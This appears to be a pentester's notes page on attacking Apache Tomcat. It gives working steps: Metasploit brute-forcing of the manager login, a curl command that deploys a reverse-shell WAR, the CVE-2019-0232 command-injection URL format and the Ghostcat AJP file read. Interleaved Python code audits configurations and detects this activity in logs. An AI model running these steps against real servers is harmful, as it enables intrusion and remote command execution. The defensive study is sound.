Apache Tomcat
Apache Tomcat is an open-source web server. It provides a Java HTTP web server environment in which Java code can run.
- GitHub (7.2k ★)
- Documentation
Version 11 is still in development. The previous major versions are version 10 (2021), version 9 (2018), and version 8 (2016).
A Java web application can use servlets, JSPs, or both. A combination of both is the most common architecture.
- Servlets: the whole logic is in Java.
- JSP: HTML-like template files in which we can add Java logic to handle input and create interactive pages.
The admin panel used to upload applications is usually at `/manager/html`. To upload an application, you need to package it as a WAR archive. Each app is deployed at a URI, and `index.jsp` is loaded by default (otherwise an error is returned).
Pentester Notes ⚠️
- You can try tomcatWarDeployer (0.4k ★, 2022 🪦), but it's memory-hungry, buggy, unstable, and you need to patch the code first. It's a multipurpose tool (from enumeration to exploitation, albeit basic).
Enumeration
- You can use nmap. It often runs on port 8080.

```
$ sudo nmap IP -sCV -v
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
```

- We can often recognize a website using Apache Tomcat from the presence of the `JSESSIONID` cookie, and we may also trigger an error to see the layout of the error page. Additionally, the URI `/docs` may be available and expose the Tomcat version.
- Maybe Spring Boot Actuators are being used.
- We can disclose the Tomcat version by sending a request with an invalid method that should raise a 405 (e.g. `curl -X PUT URL`).
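The checks above (session cookie, error-page layout, 405 from an unsupported method) are easy to turn into a regression test for your own servers: after hardening, confirm the responses no longer carry a version string. The following is an added example, not code from the original notes; the two sample responses are constructed, modelled on Tomcat 9's stock error page, and the names `fingerprint_tomcat` and `leaks_version` are mine. Note that `JSESSIONID` is the Servlet specification's default session cookie name, so on its own it only identifies a servlet container, not Tomcat specifically.

```python
import re

# Tomcat's stock ErrorReportValve page ends with "<h3>Apache Tomcat/<version></h3>";
# this is the string that a 405 from "curl -X PUT" (or the /docs app) gives away.
VERSION_RE = re.compile(r"Apache Tomcat/(\d+(?:\.\d+)+)")


def fingerprint_tomcat(status, headers, body):
    """Collect Tomcat indicators from one HTTP response.

    headers: dict with lowercase names; several Set-Cookie values may be joined by "\n".
    Returns a dict; "version" is None when the response does not leak one.
    """
    set_cookie = headers.get("set-cookie", "")
    server = headers.get("server", "")
    match = VERSION_RE.search(body)
    return {
        "status": status,
        # JSESSIONID is the Servlet spec's default cookie name: it says "some servlet
        # container", not "Tomcat", so treat it as a weak indicator.
        "jsessionid": re.search(r"(?im)^\s*JSESSIONID=", set_cookie) is not None,
        "server_header": server if "tomcat" in server.lower() else None,
        "version": match.group(1) if match else None,
    }


def leaks_version(responses):
    """True if any (status, headers, body) tuple discloses a Tomcat version string."""
    return any(fingerprint_tomcat(*r)["version"] for r in responses)


# Constructed sample: what "curl -X PUT" gets back from an unhardened Tomcat 9.
SAMPLE_405 = (
    405,
    {"content-type": "text/html;charset=utf-8",
     "set-cookie": "JSESSIONID=5F2A9C0D; Path=/; HttpOnly"},
    '<!doctype html><html lang="en"><head><title>HTTP Status 405 \u2013 Method Not Allowed</title></head>'
    '<body><h1>HTTP Status 405 \u2013 Method Not Allowed</h1><hr class="line" />'
    '<p><b>Type</b> Status Report</p><p><b>Message</b> Method Not Allowed</p>'
    '<hr class="line" /><h3>Apache Tomcat/9.0.65</h3></body></html>',
)

# Constructed sample: the same request after a custom <error-page> was configured in
# web.xml; the session cookie still betrays a servlet container, but the version is gone.
SAMPLE_HARDENED = (
    405,
    {"content-type": "text/html",
     "set-cookie": "JSESSIONID=8C1D44E2; Path=/; HttpOnly; Secure"},
    "<html><body><h1>Method not allowed</h1></body></html>",
)

if __name__ == "__main__":
    for sample in (SAMPLE_405, SAMPLE_HARDENED):
        print(fingerprint_tomcat(*sample))
    print("version leaked:", leaks_version([SAMPLE_405, SAMPLE_HARDENED]))
```

Feeding real responses in requires only building the `(status, headers, body)` tuple from whichever HTTP client you use; the parser itself stays offline.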
Foothold
- If you close the login prompt, you may see default credentials.
- We can try to brute-force the manager account using Metasploit:

```
$ msfconsole -q
msf6> use auxiliary/scanner/http/tomcat_mgr_login
msf6> set RHOSTS <target>
msf6> set STOP_ON_SUCCESS true
msf6> set ANONYMOUS_LOGIN true
msf6> set BLANK_PASSWORDS true
msf6> run
```
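The manager login above only succeeds when `tomcat-users.xml` holds a guessable account with a manager role, so the defender-side counterpart is to audit that file. This is an added example, not part of the original notes or of Tomcat itself; the weak-password list is a short illustrative set (`tomcat`/`s3cret` is the example shipped in Tomcat's own manager how-to), the sample file is constructed, and `audit_tomcat_users` is my name. The plaintext check only applies when passwords are stored in clear; digested passwords are skipped by the check.

```python
import xml.etree.ElementTree as ET

# Illustrative, not exhaustive: passwords that appear in Tomcat documentation examples
# and in every default-credential wordlist.
WEAK_PASSWORDS = {"", "admin", "tomcat", "s3cret", "password", "manager"}
# Roles that control deployments or JMX and therefore deserve a second look.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}


def _local(tag):
    # tomcat-users.xml normally carries xmlns="http://tomcat.apache.org/xml"
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return {username: [issue, ...]} for every <user> in a tomcat-users.xml document."""
    report = {}
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or "?"
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        issues = []
        if password == "":
            issues.append("blank password")
        elif password.lower() in WEAK_PASSWORDS:
            issues.append("well-known default password")
        for role in sorted(roles & PRIVILEGED_ROLES):
            issues.append(f"privileged role: {role}")
        # Tomcat's manager how-to advises never giving manager-script/manager-jmx to a
        # user that also has manager-gui, because the GUI user is exposed to CSRF.
        if "manager-gui" in roles and roles & {"manager-script", "manager-jmx"}:
            issues.append("manager-gui combined with script/jmx role (CSRF exposure)")
        report[name] = issues
    return report


# Constructed sample tomcat-users.xml with one bad account, one acceptable deployer
# and one blank-password read-only account.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="probe"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deployer" password="Ld7!wq9#Zp-Vx41" roles="manager-script"/>
  <user username="viewer" password="" roles="probe"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for user, issues in audit_tomcat_users(SAMPLE_TOMCAT_USERS).items():
        print(user, "->", issues or "ok")
```

Run it against `conf/tomcat-users.xml` (on Debian-style installs under `/etc/tomcat9/`) and treat any account that combines a weak password with a manager role as the finding a brute-force scan would have produced.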
Exploitation
- If you have access to the manager, you can try to upload a reverse shell. Refer to reverse shell#tomcat for more information.
- You can also use Metasploit to upload a reverse shell.
- You can use cURL to upload a WAR too:

```
$ curl --upload-file revshell.war -u 'username:password' "URL/manager/text/deploy?path=/shell"
```
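Both the login guessing in the Foothold section and the WAR upload above leave a clear trail in Tomcat's access log: a burst of 401s against `/manager/` followed by a 200 on `/manager/text/deploy`. The detector below is an added example, not from the original notes: it parses the AccessLogValve "common" pattern (`%h %l %u %t "%r" %s %b`), the threshold is a hypothetical value to tune per site, and the log lines are constructed.

```python
import re
from collections import Counter

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Hypothetical threshold; tune it to the site's real administrative traffic.
BRUTE_FORCE_THRESHOLD = 5
# Paths through which a WAR reaches the server: the text API used by curl/metasploit
# and the HTML manager's upload form.
DEPLOY_PREFIXES = ("/manager/text/deploy", "/manager/html/upload")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_manager_abuse(lines, threshold=BRUTE_FORCE_THRESHOLD):
    """Count 401s per source IP on /manager/ and record successful deployments."""
    failed = Counter()
    deployments = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        if rec["status"] == "401":
            failed[rec["ip"]] += 1
        elif rec["status"] == "200" and rec["path"].startswith(DEPLOY_PREFIXES):
            deployments.append((rec["ip"], rec["user"], rec["method"], rec["path"]))
    return {
        "brute_force": {ip: n for ip, n in failed.items() if n >= threshold},
        "deployments": deployments,
    }


# Constructed sample log: ordinary admin traffic from the LAN, then a password-guessing
# burst followed by a successful WAR deploy from the same external address.
SAMPLE_LOG = [
    '10.0.0.5 - admin [12/Mar/2024:09:58:10 +0000] "GET /manager/html HTTP/1.1" 200 19043',
    '198.51.100.9 - - [12/Mar/2024:10:01:44 +0000] "GET /docs/ HTTP/1.1" 200 6412',
] + [
    f'203.0.113.7 - - [12/Mar/2024:10:15:{s:02d} +0000] "GET /manager/html HTTP/1.1" 401 2473'
    for s in range(1, 7)
] + [
    '203.0.113.7 - tomcat [12/Mar/2024:10:15:09 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 32',
    '203.0.113.7 - - [12/Mar/2024:10:15:12 +0000] "GET /shell/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    result = detect_manager_abuse(SAMPLE_LOG)
    for ip, n in result["brute_force"].items():
        print(f"ALERT manager brute force: {ip} had {n} 401 responses")
    for ip, user, method, path in result["deployments"]:
        print(f"ALERT deployment by {user!r} from {ip}: {method} {path}")
```

Every successful deployment is worth alerting on regardless of the 401 count, since a correct password on the first try looks exactly like a legitimate release; correlate it with the change calendar rather than suppressing it.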
Well-known CVEs
- CVE-2019-0232: on a Windows host, if there is a CGI script and `enableCmdLineArguments` was enabled (defaults to disabled), it can be exploited to run arbitrary commands. You must find the CGI directory, which is often `/cgi` or `/cgi-bin/`, and find at least one script. Use `URL/xxx/yyy.bat?&dir` to execute `dir`.
  - Use `+` instead of spaces. Use `\` in paths.
  - Don't forget to URL-encode the payload.
  - Use redirections when needed (e.g. `dir+>+output` to create 'output').
  - Display environment variables using `&set`. If `PATH` is not set, you have to use the full path (e.g. `c:\windows\system32\whoami.exe`).

  You can use the Metasploit module `tomcat_cgi_cmdlineargs`.
Apache AJP
Apache AJP is a wire protocol. It allows a web server such as Apache httpd to talk to Tomcat. A few notes:
- It runs on port 8009/TCP (by default).
- It's not often exposed.
- We need to configure a web server to communicate with it.
While uncommon, if a Tomcat website is behind a firewall but the AJP port is exposed, we can use AJP to access the 'hidden' Tomcat website.
AJP Exploitation
```
$ git clone https://github.com/hypn0s/AJPy.git && cd AJPy
$ python tomcat.py --port 8009 "version" IP
<prints tomcat manager version>
```
AJP Well-known CVEs
- CVE-2020-1938: unauthenticated LFI that can be used to read files in the webroot, such as `WEB-INF/web.xml` or `WEB-INF/cgi/xxx.bat`. Apache JServ, which usually runs on port 8009, must be exposed. It can be exploited using Metasploit:

```
msf6> use auxiliary/admin/http/tomcat_ghostcat
```

The file `web.xml` contains the manager credentials if they were defined.
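The two CVEs on this page are both configuration-gated: CVE-2019-0232 needs a `CGIServlet` registered with `enableCmdLineArguments` set to `true`, and CVE-2020-1938 needs an AJP connector that is reachable and unauthenticated (the Ghostcat fixes in 9.0.31, 8.5.51 and 7.0.100 made the connector bind to loopback and require a `secret` by default). The audit below is an added example, not from the original notes or from Tomcat: `audit_cgi_servlet` and `audit_ajp_connectors` are my names, the `old_defaults` switch models the pre-fix behaviour as an assumption for older builds, and the `web.xml`/`server.xml` fragments are constructed.

```python
import xml.etree.ElementTree as ET

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"
ALL_INTERFACES = {"0.0.0.0", "::", "0:0:0:0:0:0:0:0"}


def _local(tag):
    # web.xml carries xmlns="http://xmlns.jcp.org/xml/ns/javaee"; server.xml has no namespace.
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name):
    for child in el:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def audit_cgi_servlet(web_xml):
    """Report CGIServlet registrations with enableCmdLineArguments=true (CVE-2019-0232 precondition)."""
    issues = []
    for servlet in ET.fromstring(web_xml).iter():
        if _local(servlet.tag) != "servlet" or _child_text(servlet, "servlet-class") != CGI_SERVLET_CLASS:
            continue
        params = {_child_text(p, "param-name"): _child_text(p, "param-value")
                  for p in servlet if _local(p.tag) == "init-param"}
        name = _child_text(servlet, "servlet-name") or "?"
        if params.get("enableCmdLineArguments", "false").lower() == "true":
            prefix = params.get("cgiPathPrefix", "WEB-INF/cgi")
            issues.append(f"servlet '{name}': enableCmdLineArguments=true for scripts under {prefix}")
    return issues


def audit_ajp_connectors(server_xml, old_defaults=False):
    """Report AJP connectors that lack the CVE-2020-1938 mitigations.

    old_defaults=True models Tomcat before 9.0.31 / 8.5.51 / 7.0.100 (assumption used
    here): a Connector without an address attribute bound to all interfaces.
    """
    issues = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address in ALL_INTERFACES or (address is None and old_defaults):
            issues.append(f"AJP connector on port {port} listens on all interfaces")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append(f"AJP connector on port {port} has secretRequired=false")
        elif not conn.get("secret"):
            issues.append(f"AJP connector on port {port} has no secret attribute")
    return issues


# Constructed web.xml fragment: the CGI servlet from conf/web.xml with the dangerous setting on.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param><param-name>cgiPathPrefix</param-name><param-value>WEB-INF/cgi</param-value></init-param>
    <init-param><param-name>enableCmdLineArguments</param-name><param-value>true</param-value></init-param>
    <load-on-startup>5</load-on-startup>
  </servlet>
</web-app>
"""

# Constructed server.xml fragments: an exposed AJP connector and a hardened one.
SAMPLE_SERVER_XML_EXPOSED = """<Server port="8005" shutdown="SHUTDOWN"><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector protocol="AJP/1.3" address="0.0.0.0" port="8009" secretRequired="false" redirectPort="8443"/>
</Service></Server>"""
SAMPLE_SERVER_XML_HARDENED = """<Server port="8005" shutdown="SHUTDOWN"><Service name="Catalina">
  <Connector protocol="AJP/1.3" address="127.0.0.1" port="8009" secret="REPLACE-WITH-RANDOM-SECRET"/>
</Service></Server>"""

if __name__ == "__main__":
    print(audit_cgi_servlet(SAMPLE_WEB_XML))
    print(audit_ajp_connectors(SAMPLE_SERVER_XML_EXPOSED))
    print(audit_ajp_connectors(SAMPLE_SERVER_XML_HARDENED))
```

Point `audit_cgi_servlet` at both `conf/web.xml` and each application's `WEB-INF/web.xml`, since the servlet can be registered in either; an empty result from `audit_ajp_connectors` still assumes the host firewall does not forward 8009 from outside.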
To-do
Stuff that I found, but never read/used yet.
- apache-tomcat-pentesting
- Jetty - it seems like an alternative
- `/manager/status`: server status (admin:admin) - not the same credentials on each page
- when uploading, on the same page, there is information about the server architecture, which we can use to fine-tune the payload
- `jar -ft revshell.jar` / jd-gui: to see the Metasploit endpoint name
- when pressing ESC on login, it may print the message with the default credentials
- `/etc/tomcat9/<config files>`
- `web.xml`, `tomcat-users.xml`
- `SESSIONS.ser`

While not really related:
- `/control/xmlrpc`, `/webtools/control/main`, `/control/checkLogin`
- Try default credentials (`admin:ofbiz`)
- CVE-2023-50164 leads to RCE